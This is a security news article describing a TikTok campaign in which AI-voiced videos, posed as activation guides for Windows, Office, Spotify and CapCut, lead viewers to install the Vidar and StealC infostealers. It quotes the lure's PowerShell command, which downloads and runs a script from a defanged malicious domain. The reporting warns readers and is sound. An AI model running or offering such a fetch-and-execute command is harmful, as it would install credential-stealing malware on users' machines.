HomeYoutubeBeware! Popular TikTok videos promote malware apps

Beware! Popular TikTok videos are promoting malware apps

Cybercriminals have discovered a new avenue for distributing malware, taking advantage of TikTok's massive user base and algorithmic reach.

See also: Donald Trump gives TikTok a 90-day extension

A sophisticated social engineering campaign has emerged, using AI-generated videos to trick users into downloading dangerous data-stealing malware disguised as software activation guides.

TikTok malware

These deceptive videos promise to help users activate legitimate applications, such as Windows OS, Microsoft Office, CapCut , and Spotify , but in reality they install the notorious Vidar and StealC malware , without the victims' knowledge.

This campaign represents a significant evolution in malware distribution tactics, moving away from traditional online methods and exploiting the trust and interaction offered by social media platforms.

Unlike traditional attacks based on malicious websites or phishing attacks, this particular campaign embeds all the elements of social engineering directly into the video content, making it particularly difficult for security systems.

See also: TikTok for Artists: New platform for artists and musicians

Attackers are exploiting the viral nature of TikTok, with one of the malicious videos garnering nearly 500,000 views, over 20,000 likes, and more than 100 comments — demonstrating the campaign’s alarming reach and effectiveness.

Beware! Popular TikTok videos are promoting malware apps
Beware! Popular TikTok videos are promoting malware apps

Trend Micro analysts identified multiple TikTok accounts involved in this operation, including @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771, which have now been deactivated.

Researchers observed that these accounts posted strikingly similar videos without faces, with AI-generated voices, suggesting an automated production process designed for mass scale. The technical sophistication of the attack is evident in its implementation methodology.

See also: European Commission accuses TikTok of violating DSA

Victims are instructed to open PowerShell and execute a seemingly harmless command: iex (irm hxxps://allaivo[.]me/spotify). This PowerShell script triggers a multi-stage infection process that leverages sophisticated evasion techniques.

Source: cybersecuritynews

Selecting the team

🔒 Protect your privacy with Proton VPN

Swiss VPN from the creators of Proton Mail — strict no-logs policy, strong encryption, and built-in NetShield that blocks ads, trackers, & malware.

  • ✔ No-logs, based in Switzerland (except 14-Eyes)
  • ✔ NetShield: blocks ads, trackers & malicious domains
  • ✔ Covers all devices — free version available
Try Proton VPN for free — 30-day money-back guarantee →

The link is an affiliate link — SecNews may receive a commission at no additional cost to you. It does not affect the independence of our article writing.

📧
Subscribe to the SecNews Newsletter

The most important Security & Technology news in your Inbox.

Absentee Mia
Absentee Miahttps://www.secnews.gr
Being your self, in a world that constantly tries to change you, is your greatest achievement

SEARCH

FOLLOW US

📧
Newsletter SecNews
The most important Security & Technology news in your inbox.

LIVE NEWS